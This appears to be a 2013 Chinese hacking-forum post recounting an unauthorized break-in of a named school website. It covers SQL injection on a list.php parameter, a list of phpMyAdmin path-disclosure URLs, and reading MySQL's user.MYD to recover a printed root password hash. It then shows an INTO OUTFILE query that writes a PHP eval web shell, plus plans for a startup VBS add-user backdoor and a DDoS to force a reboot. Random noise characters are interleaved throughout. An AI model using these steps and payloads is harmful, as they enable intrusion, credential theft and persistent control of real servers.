第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏
5 X; c* i" m% L9 ]发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!
1 B2 A: K+ w+ i) M8 j, X; x! a1 \, ?! ^; U" N( h" M
+ ?7 j4 z, o7 E8 o7 d$ W5 G
: J: Y/ I8 J& o3 k& V常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 2 p5 n) W! B' F1 S9 x: _% }3 H1 T
! W; z% j. m, b; _2 J' D/ y; ~那么想可以直接写入shell ,getshell有几个条件:
* C) E: z2 a. I9 K2 D1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF
# U- x$ B( F' s7 x) m
4 o3 f: g8 \ B0 U试着爆绝对路径:
9 R4 l, Y( W& S1./phpMyAdmin/index.php?lang[]=1 * }, d4 S; P0 [) x* E" `
2./phpMyAdmin/phpinfo.php % H. X/ p7 {% _" @/ k& m
3./load_file()
, P! g" \3 N% a) w/ j) c0 [4./phpmyadmin/themes/darkblue_orange/layout.inc.php & [- `5 _; {6 S5 ^/ R
5./phpmyadmin/libraries/select_lang.lib.php 6 j0 q7 O- P1 g3 \, I+ @: z, H$ T
6./phpmyadmin/libraries/lect_lang.lib.php 8 ^7 f: n; T( [
7./phpmyadmin/libraries/mcrypt.lib.php
! a6 y( E( p) j, k: K8 {1 s% ^8./phpmyadmin/libraries/export/xls.php
# J) r' k( v" I5 q4 u$ p" ^8 [
+ p- Y% r: h4 e/ n+ l4 i: ~均不行........................... 4 e$ B" e0 |, X9 X8 K' t" c6 T! J
: Y1 n+ ^7 ^$ s8 W御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php
$ f/ a) n! V) X4 l1 \ x4 k! N) t. T. g* }7 _) r3 P [4 M
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
# p6 ]8 w# r( u& ~; B& L, E5 E7 o3 a8 A9 |
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败 8 p2 Z( X& A4 g. s2 Y: w: u
+ E& Z3 O$ X, R$ ^2 Z敏感东西: http://202.103.49.66/Admincp.php 社工进不去........... * x6 E2 @- |- P+ l Q& {
" k4 z( f0 ?. K; S
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell
; O; D% e+ I& p" m
) `. r+ Z! i8 jhttp://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini / Q# X; r: U1 _* ?
# J! v* w0 d0 G; d! J' q. E* g: |( D自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD 9 E4 H3 }" b" z* D
1 T4 _9 S8 M. v( b2 n( ~成功读到root密码:
& F8 t: Q! ^( n/ c# o4 `# ]9 H$ H( ]% a- V: t
17---- r(0072) 7 Z2 d+ D/ l1 d- I/ }6 V* o" Q- z+ r
18---- o(006f) ! ~& Y8 B+ W% a* P: X$ P/ t# q1 R
19---- o(006f) + T8 X& K- N0 M/ h% y; J2 Y, W! ?
20---- t(0074)
% ?6 t( I; G$ ^& D21---- *(002a) ; O, Z$ ]; u. j2 q* @6 E
22---- 8(0038) % T4 U* k8 K H% r9 T' W! S
23---- 2(0032) 1 p% k! p4 A: r0 P
24---- E(0045) . ?. ?6 s( s e; `" V v6 R+ \
25---- 1(0031)
. P! _- Y3 D: C _& ^1 Y26---- C(0043) 5 w) V ^9 d/ A/ W9 G8 X
27---- 5(0035)
$ n5 a5 c l0 }5 W0 k3 J6 ^28---- 8(0038)
/ o7 A& t! p* a4 ~1 h, d8 _, {29---- 2(0032) ( ]$ W, b) T4 l6 {
30---- 8(0038) + j& _1 F4 o" n5 M1 j; T6 \5 F+ k
31---- A(0041)
# t* x6 s3 J9 ]8 q# c3 S* b2 [" q32---- 9(0039)
1 W9 e" ^, j6 a+ U! C8 ~33---- B(0042) , J" u& f" C& V( A
34---- 5(0035)
, l: G& E, o" i4 G1 {, U |: p+ q4 f35---- 4(0034)
1 i2 T, \% f+ A7 {8 ^6 p2 W! I, S36---- 8(0038) 9 W' {3 L$ z# v* @+ f
37---- 6(0036) 4 e. G* \0 y( m1 _2 D6 b/ E
38---- 4(0034)
( b. w1 y# T& d$ i39---- 9(0039) $ M4 k/ S0 \" s6 _- |
40---- 1(0031) ! G$ B0 F2 x0 R
41---- 1(0031) 2 E% \0 J5 h; m# o% |% F
42---- 5(0035)
% d0 `& }6 f4 m43---- 3(0033)
: _( }8 O1 @- ]44---- 5(0035) # a+ _2 g R6 C' `4 ~
45---- 9(0039)
9 N* D, e" n5 I5 T: b46---- 8(0038)
( K/ G" U5 v& T. n( X2 }, U47---- F(0046)
( S+ {& ?) b7 {0 J, r4 Y! e48---- F(0046) # X6 [. S# |2 s3 \3 h; N1 _
49---- 4(0034)
F0 K( ^+ x( P1 d50---- F(0046)
% M8 k! C; ?+ Q( ~4 J* n51---- 0(0030)
% }8 l2 V1 y( f5 K+ Q52---- 3(0033)
) ~; M6 q+ X( D1 g/ w5 |7 a6 i53---- 2(0032)
3 k: x4 _ U1 C H54---- A(0041) / F @5 }& v1 Z2 u, n* ~8 l' l0 ]! T
55---- 4(0034)
3 ]# s) U7 a8 Y3 \8 d56---- A(0041) - E: y) y6 i" s7 m- [ {
57---- B(0042) $ t+ ^; s6 h- \
58---- *(0044)
2 i& l; I) X% l59---- *(0035) ! S1 y/ `8 K* X$ _
60---- *(0041)
3 n5 H/ x- R& d4 `# i61---- *0032) $ Q* s7 p2 c' F) [9 h" d! V% f
4 d* u- A7 V. A9 C9 {5 z% Y* n解密后成功登陆phpmyamin
- }1 q* D0 c3 ~9 S: P* O + R- T+ l5 D6 i$ c2 ^, c: b( `
. y+ x2 ], z5 v& M
* ?0 D7 u6 N9 ?2 u Z. m( _3 B
# U, V+ k2 c0 t- ?3 y b找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
5 x4 [/ `) Z7 O3 Y
4 Z8 C: m' d3 J$ P: L9 r, Q成功执行,拿下shell,菜刀连接: 6 D" i' r$ g1 K7 Y- E
% ~2 z0 {' v' t+ M4 R; k% D
服务器不支持asp,aspx,php提权无果................... % j. f) J9 V; s
& D$ r& B: T2 W
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里: $ i" T) c* b( p+ e0 a& H3 }
服务器上已经有个隐藏帐号了
1 c$ ~% w8 Q$ L! f, d, }; { i别名 administrators
" t# O1 m; ]2 h+ x1 }0 X& U注释 管理员对计算机/域有不受限制的完全访问权 3 m/ d3 g# m: }+ G. F. ^: J
成员
+ [9 n5 C3 g+ _& `9 e# }-------------------------------------------------------------------------------
/ S# c2 O$ }% q6 U( {, z( D Zadmin0 j* c8 |6 u! R0 g5 I1 P9 S! ]$ x
Administrator- F& }* ~' a! K
slipper$
3 V+ y: g! Y6 l4 c" H+ |sqluser2 h) w. ~7 O8 L6 ]
命令成功完成。
: O) D5 t% q2 e+ U8 j" t
4 U. R( h4 ]- L a: J6 h( f: m7 q服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。" e7 J8 p1 V$ B; e3 Y2 D
4 Y1 U, _9 S4 K7 Iddos服务器重启,不然就只能坐等服务器重启了...............................' q+ q4 H8 L; B2 {) {2 {
, ~; \& q, z1 G 0 X1 _& y7 ` S* J
| 
发表于 2013-1-11 21:32:15
收藏
支持
反对
发表于 2013-5-20 15:28:12
